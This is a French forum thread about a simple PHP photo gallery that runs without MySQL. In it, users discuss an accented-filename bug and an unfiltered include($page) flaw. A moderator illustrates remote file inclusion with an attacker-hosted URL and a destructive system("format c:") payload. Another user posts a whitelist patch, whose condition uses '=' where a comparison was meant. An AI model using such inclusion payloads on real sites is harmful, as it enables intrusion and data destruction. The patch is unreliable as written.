GALERIE PHOTO SIMPLE D'UTILISATION, SANS MYSQL

Signaler
Messages postés
95
Date d'inscription
mercredi 27 octobre 2004
Statut
Membre
Dernière intervention
1 décembre 2007
-
Messages postés
6
Date d'inscription
lundi 7 novembre 2005
Statut
Membre
Dernière intervention
21 juin 2006
-
Cette discussion concerne un article du site. Pour la consulter dans son contexte d'origine, cliquez sur le lien ci-dessous.

https://codes-sources.commentcamarche.net/source/31083-galerie-photo-simple-d-utilisation-sans-mysql

Messages postés
6
Date d'inscription
lundi 7 novembre 2005
Statut
Membre
Dernière intervention
21 juin 2006

Bonjour Cdrik & vous tous,

Cette source est top et ce qui est génial c'est que l'on peut voir les améliorations apportées par cette communauté d'internautes.

Etais-tu au courant qu'il y avait un bug lié aux caractères es noms de fichiers images importées ?
Ok, les espaces sont gérés " " devient %20 ce qui est très bien, mais cela ne marche pas pour un "é", un "è" ... toutes les lettres accentuées...

Il y-a t'il qqun de compétent pour me dire pourquoi le code corrigé suivant ne marche pas ?
...
$dir=strtr($dir, "èéëàäâ", "eeeaaa");
...
Ce n'est pas la même fonction que pour l'espace (et il faudra cumuler ces 2 vérifs, j'en suis conscient) et malheureusement cela ne fonctionne pas.

Autre chose : Firefox semble + intéllo que IE car lui modifie en temps réel je ne sais pas comment dire, les nom de fichiers stockés avec des lettre accentuées (Blé.jpg ->Bl%E9.jpg) !! Malheureusement Firefox n'en est qu'à 15% des utilisateurs du net...

La solution serait de faire fonctionner la fonction ci-dessus et anticiper les erreurs possibles : une aide ?

Merci Cdrik ainsi que tous les autres
Guillaume
(kergui@club-internet.fr)
Messages postés
12303
Date d'inscription
mardi 10 février 2004
Statut
Modérateur
Dernière intervention
30 juillet 2012
38
c'est claire, pour plus de détails, j'ai fait un tuto sur la sécuritée, mais la, tu fais un truc du genre :

http://magalerie.com?page=http://monsite.com/monprogrammehack.txt

et dans monprogrammehack.txt:

system("format c:");
Messages postés
2
Date d'inscription
vendredi 8 avril 2005
Statut
Membre
Dernière intervention
13 novembre 2005

Salut tout le monde j'etait en train de tester cette gallerie qui me convine super bien (hormis le mysql que j'ai rajouté) et j'ai remarquer les includes de ouf dans le code

include ($page);

ATTENTION c'est PAS SECURE DU TOUT !!!!!
Je suis pas du tout un pro en securité php mais la ca m'a choqué (aucun filtre arg!! )

Juste pour que vous repreniez le code, sur le photo.php j'ai rajouté ca
<?php
error_reporting(E_ALL);

include("./galerie/inc/config.php");

if (isset( $_GET['page']) or $_GET['page']='') {
$act = $_GET['page'];
//Just an extra security measure
$allowed_acts = array('galerie/new.php', 'galerie/update.php', 'galerie/index.php', 'galerie', '', 'galerie/install_index.php', 'galerie/install_new.php', 'Rajouter tout les fichiers');
if (!in_array($act, $allowed_acts))
{
die("Invalid Action!");
}
$page=$path.$_GET['page'];
}
....................

Ca passe un tout petit peut mieux et ca me rassure

++
TouF
Messages postés
7
Date d'inscription
mardi 28 janvier 2003
Statut
Membre
Dernière intervention
2 août 2005

bien, bien, mais j'ai une erreur à chaque ajout d'un commentaire (même sicelui-ci est bien enregistré ... grrr
Afficher les 79 commentaires